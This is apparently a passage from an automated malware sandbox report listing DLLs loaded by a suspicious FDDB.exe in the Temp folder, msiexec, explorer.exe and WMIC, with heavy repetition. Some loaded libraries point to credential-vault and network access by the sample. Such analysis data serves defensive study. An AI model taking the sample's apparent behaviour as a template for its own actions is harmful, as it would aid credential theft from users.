Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
